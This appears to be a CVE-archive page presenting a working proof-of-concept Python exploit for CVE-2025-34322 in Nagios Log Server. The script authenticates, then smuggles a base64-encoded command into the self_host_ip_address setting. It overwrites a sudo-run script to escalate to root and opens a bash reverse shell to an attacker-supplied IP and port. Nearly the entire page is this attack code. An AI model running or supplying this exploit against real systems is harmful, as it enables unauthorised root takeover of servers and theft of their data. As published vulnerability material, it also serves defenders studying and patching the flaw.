4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-34322
README.md
Rendering markdown...
POC / root_exploit.py PY
⬇ Raw GitHub ✕ Close 
import requests
import sys
import base64

## Usage
# $ python3 root_exploit.py <nagios-logserver-url> <username> <password> <local-ip> <local-port>

host = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
local_ip = sys.argv[4]
local_port = sys.argv[5]

proxies = dict.fromkeys(['http','https'],'http://127.0.0.1:8080')

login_url = f'{host}nagioslogserver/login'
globals_setting_url = f'{host}nagioslogserver/admin/globals'
nlq_url = f'{host}nagioslogserver/dashboard/natural_language_to_query'
get_output = f'{host}nagioslogserver/scripts/test.txt'

# reverse shell, can replace with any command Ex: `id>/var/www/html/nagioslogserver/www/scripts/test.txt` if you just want to see `root` run a command and get the output from the webserver
## `nc -nlvp <local_port>` to listen for incoming connection

root_command = f"""bash -c '(bash -i >& /dev/tcp/{local_ip}/{local_port} 0>&1)&';
cp /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chown root:root /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh"""
root_command_b64 = base64.b64encode(root_command.encode()).decode()

privesc_shell_script = f"""mv /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh.bak;
echo '{root_command_b64}' |base64 -d > /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
chmod +x /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
sleep 1;
sudo /usr/local/nagioslogserver/scripts/reconfigure_ncpa.sh;
"""

base64_cmd = base64.b64encode(privesc_shell_script.encode()).decode()

cmd = f"echo {base64_cmd}|base64 -d|bash"


with requests.Session() as s:
    s.proxies.update(proxies)
    s.verify = False

    csrf_req = s.get(login_url)
    csrf_ls = csrf_req.cookies['csrf_ls']
    
    login_payload = {
        'csrf_ls': csrf_ls,
        'username': username,
        'password': password
    }
    login_req = s.post(login_url, data=login_payload, allow_redirects=False)
    if 'ls_session' not in login_req.cookies:
        print("[-] Incorrect credentials")
        exit()
    
    print(f"[+] Login worked, adding command injection to self_host_ip_address")


    cmd_injection_payload = {
        "csrf_ls": csrf_ls,
        "natural_language_query": 1,
        "nlp_disclaimer": "on",
        "ai_provider": "self_hosted",
        "self_host_ip_address": f"`{cmd}`",
        "ai_port": 8000,
        "saveglobals":1
    }
    cmd_injection_res = s.post(globals_setting_url, data=cmd_injection_payload)

    if not cmd_injection_res.ok:
        print(f"[-] Cmd injection probably didn't work")
        exit()
    if cmd not in cmd_injection_res.text:
        print(f"[*] Command didn't show up in the response text, still check if it works...")
    
    print(f"[*] Triggering command with request to natural language query endpoint {nlq_url}")

    nlq_res = s.get(nlq_url)

    if not nlq_res.ok:
        print(f"[-] Something failed requesting {nlq_url}, check {get_output} for cmd output")